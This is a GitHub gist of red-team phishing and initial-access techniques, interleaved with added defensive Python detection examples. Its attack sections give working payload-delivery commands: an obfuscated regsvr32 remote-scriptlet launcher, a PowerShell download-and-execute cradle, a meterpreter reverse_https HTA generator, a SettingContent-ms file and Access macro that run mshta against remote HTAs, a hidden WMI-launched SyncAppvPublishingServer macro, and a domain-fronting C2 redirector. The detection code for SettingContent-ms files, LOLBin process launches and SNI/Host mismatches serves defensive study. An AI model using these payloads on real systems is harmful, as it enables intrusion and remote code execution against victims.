adon90/7568d478541054d703b9af27ba96797e (last active August 27, 2022 13:24)
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g.
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
2. Generate Macro (by enigma0x3)
iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1');
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1
3. Macroless OLE SettingContent-ms
python unicorn.py windows/meterpreter/reverse_https IP 443 hta
--------------------------
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
--------------------------
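From the defender's side, the SettingContent-ms trick above is easy to triage statically: the file is plain XML, and Windows launches whatever the DeepLink element names. Legitimate files point at control.exe with a /name argument, so a DeepLink that names a script host or carries a URL is the indicator. The following Python is an added example, not code from the gist or its author; the first sample is the XML from section 3, the second is a constructed benign file, and the list of flagged binaries is my own choice.

```python
"""Added example (not code from the gist): static triage of .SettingContent-ms files.

Windows treats a SettingContent-ms file as a shortcut to a Settings/Control Panel
page and launches whatever <DeepLink> names. Legitimate files point at control.exe
with a /name argument, so a DeepLink that names a script host or carries a URL is
the indicator to alert on. Both sample files below are embedded for this example.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Default namespace declared on <SearchableContent>; child elements inherit it.
NS = {"sc": "http://schemas.microsoft.com/Search/2013/SettingContent"}

# Binaries a Settings shortcut has no legitimate reason to launch (my own list).
SCRIPT_HOSTS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe", "certutil.exe",
}
URL_RE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)


@dataclass
class Verdict:
    suspicious: bool
    deep_link: str
    reasons: list = field(default_factory=list)


def launched_binary(command: str) -> str:
    """Lower-cased file name of the first token of a command line ('' if empty).

    Handles a quoted first token so paths containing spaces are not split.
    """
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', command)
    first = (m.group(1) or m.group(2) or "") if m else ""
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_setting_content(xml_text: str) -> Verdict:
    """Return a Verdict for one SettingContent-ms document."""
    root = ET.fromstring(xml_text.strip().encode("utf-8"))
    el = root.find(".//sc:DeepLink", NS)
    deep_link = (el.text or "").strip() if el is not None else ""
    reasons = []
    exe = launched_binary(deep_link)
    if not exe:
        reasons.append("DeepLink missing or empty")
    elif exe in SCRIPT_HOSTS:
        reasons.append(f"DeepLink launches script host {exe}")
    elif exe != "control.exe":
        reasons.append(f"DeepLink launches unexpected binary {exe}")
    if URL_RE.search(deep_link):
        reasons.append("DeepLink contains a URL")
    return Verdict(bool(reasons), deep_link, reasons)


# Sample 1: the XML from section 3 of the gist (DeepLink runs mshta.exe against a remote HTA).
MALICIOUS_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
  </SearchableContent>
</PCSettings>
"""

# Sample 2: constructed benign shape, DeepLink opens a Control Panel page via control.exe.
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe /name Microsoft.System</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        v = triage_setting_content(sample)
        print(f"{name}: suspicious={v.suspicious} deep_link={v.deep_link!r} reasons={v.reasons}")
```

The check is deliberately an allowlist on the launched binary rather than a blocklist of URLs: an attacker can drop the URL and point DeepLink at a local script, but a Settings shortcut that launches anything other than control.exe is abnormal enough to quarantine on a mail gateway.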
* Note: set the Database on the C&C to permissions 644
4. .MAM Access Database
------------------------------
Public Function runme()
    runcalculator
End Function

Sub runcalculator()
    Shell ("mshta.exe http://IP/LICENSE.txt")
End Sub
------------------------------
5. SyncAppvPublishingServer
--------------------------------------------------
Sub Macro()
    Dim x64 As String
    x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create x64
End Sub
--------------------------------------------------------
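Sections 1, 4 and 5 all come down to a signed Windows binary (regsvr32, mshta, SyncAppvPublishingServer) being handed a command line it was never meant to run, and section 5 additionally launches through WMI so that the child's parent is WmiPrvSE.exe rather than the Office process. The Python below is an added example, not code from the gist, showing how those patterns look in process-creation telemetry: the rule names, the list of script hosts and the PowerShell hints are my own, the records are constructed in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), and the EXAMPLE_C2 host is a placeholder.

```python
"""Added example (not code from the gist): process-creation detections for the
LOLBin launch patterns in sections 1, 4 and 5 (regsvr32 remote scriptlet, mshta
remote HTA, SyncAppvPublishingServer used as a PowerShell host).

Events are constructed JSON-lines records with Sysmon Event ID 1 field names;
every value is made up for this example.
"""
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
SCRIPT_HOSTS = {
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe", "pwsh.exe",
    "cmd.exe", "wscript.exe", "cscript.exe", "syncappvpublishingserver.exe",
}
URL_RE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)
# regsvr32 /i:<url> hands a remote scriptlet to scrobj.dll.
REGSVR_REMOTE_RE = re.compile(r"/i:\s*\S*://", re.IGNORECASE)
# Tokens that only make sense if the "n;..." argument is being run as PowerShell.
PS_HINTS_RE = re.compile(
    r"New-Object|Invoke-Expression|\biex\b|DownloadString|Invoke-WebRequest|\biwr\b|\$\w",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches (possibly several)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "regsvr32.exe" and (REGSVR_REMOTE_RE.search(cmd) or "scrobj.dll" in cmd.lower()):
        hits.append("regsvr32_remote_scriptlet")
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    if image == "syncappvpublishingserver.exe":
        m = re.search(r"n;(.*)", cmd)
        if m and PS_HINTS_RE.search(m.group(1)):
            hits.append("syncappv_powershell_host")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Section 5 launches via Win32_Process.Create, so the parent is WmiPrvSE.exe,
    # not the Office process; the parent-only rule above would miss it.
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        hits.append("wmi_spawned_script_host")
    return hits


def run_detections(jsonl: str) -> dict:
    """Map each record's EventID to the list of rules it matched."""
    results = {}
    for line in jsonl.strip().splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        results[event["EventID"]] = evaluate(event)
    return results


# Constructed telemetry. evt-1/2/3 mirror sections 1, 5 and 4; evt-4/5 are benign.
SAMPLE_EVENTS = r"""
{"EventID": "evt-1", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32 /s /n /u /i:http://192.168.1.43:8080/37yWWx.sct scrobj.dll"}
{"EventID": "evt-2", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "Image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "CommandLine": "SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://EXAMPLE_C2/stage')\""}
{"EventID": "evt-3", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "C:\\Windows\\System32\\mshta.exe http://192.168.1.43/LICENSE.txt"}
{"EventID": "evt-4", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"EventID": "evt-5", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"}
"""

if __name__ == "__main__":
    for event_id, rules in run_detections(SAMPLE_EVENTS).items():
        print(f"{event_id}: {rules or 'no match'}")
```

Two of the rules key on the command line rather than the parent process precisely because of the WMI launch in section 5; a detection that only asks "did Word spawn a script host?" sees WmiPrvSE.exe as the parent and stays silent.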
6. Domain Fronting + Phishing
Redirector:
socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443
C&C:
set LHOST mscrl.microsoft.com
set HttpHostHeader xxxxxxxxxxxxx.azureedge.net
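The fronting setup in section 6 leaves one observable for anyone who terminates TLS at a proxy: the SNI hostname (mscrl.microsoft.com) and the HTTP Host header (the azureedge.net endpoint) belong to different registrable domains. The Python below is an added example, not code from the gist, that flags such pairs in key=value proxy logs. The log lines are constructed, the field names (sni, host, src) are my own, and the registrable-domain logic is a deliberately naive last-two-labels comparison that a real deployment would replace with the Public Suffix List.

```python
"""Added example (not code from the gist): flag domain-fronting candidates in TLS
proxy logs by comparing the SNI hostname with the decrypted HTTP Host header.

Log lines are constructed key=value records; sni/host/src are assumed field names.
"""
import re

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_kv(line: str) -> dict:
    """Parse a key=value log line; quoted values keep their inner text."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def registrable_domain(host: str) -> str:
    """Naive registrable domain: last two DNS labels, port and trailing dot stripped.

    Assumption for this example only; a production check should consult the
    Public Suffix List so that foo.co.uk and bar.co.uk are not treated as one owner.
    """
    name = host.lower().strip().rstrip(".").split(":")[0]
    return ".".join(name.split(".")[-2:])


def is_fronting_candidate(sni: str, host: str) -> bool:
    """True when SNI and Host header resolve to different registrable domains."""
    if not sni or not host:
        return False
    return registrable_domain(sni) != registrable_domain(host)


def find_fronting(log_text: str) -> list:
    """Return (src, sni, host) for every record whose SNI and Host disagree."""
    flagged = []
    for line in log_text.strip().splitlines():
        rec = parse_kv(line)
        if is_fronting_candidate(rec.get("sni", ""), rec.get("host", "")):
            flagged.append((rec.get("src", ""), rec["sni"], rec["host"]))
    return flagged


# Constructed proxy log: line 1 mirrors the section 6 setup; the rest are benign
# (identical names, case/port differences, or two hosts under one domain).
SAMPLE_LOG = """
ts=2022-08-27T13:24:01Z src=10.0.0.15 sni=mscrl.microsoft.com host=xxxxxxxxxxxxx.azureedge.net bytes_out=4120
ts=2022-08-27T13:24:02Z src=10.0.0.15 sni=www.microsoft.com host=www.microsoft.com bytes_out=880
ts=2022-08-27T13:24:03Z src=10.0.0.22 sni=cdn.example.net host=CDN.EXAMPLE.NET:443 bytes_out=512
ts=2022-08-27T13:24:04Z src=10.0.0.22 sni=static.example.org host=img.example.org bytes_out=2048
"""

if __name__ == "__main__":
    for src, sni, host in find_fronting(SAMPLE_LOG):
        print(f"fronting candidate from {src}: SNI={sni} Host={host}")
```

Treat a hit as a triage signal rather than a verdict: CDNs and shared hosting produce SNI/Host mismatches legitimately, so the useful follow-up is to group by destination CDN and look for a Host header nobody in the organisation has any business reaching.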